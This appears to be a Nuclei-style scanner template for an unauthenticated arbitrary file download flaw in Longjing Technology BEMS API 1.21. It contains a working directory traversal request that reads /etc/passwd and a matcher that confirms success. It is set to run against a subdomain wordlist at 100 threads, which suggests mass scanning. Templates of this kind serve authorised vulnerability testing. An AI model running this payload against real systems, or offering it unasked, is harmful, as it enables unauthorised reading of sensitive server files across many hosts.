id: bems-api-lfi

info:
  name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download
  author: gy741
  severity: high
  description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.
  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
  tags: lfi

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: */*
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200
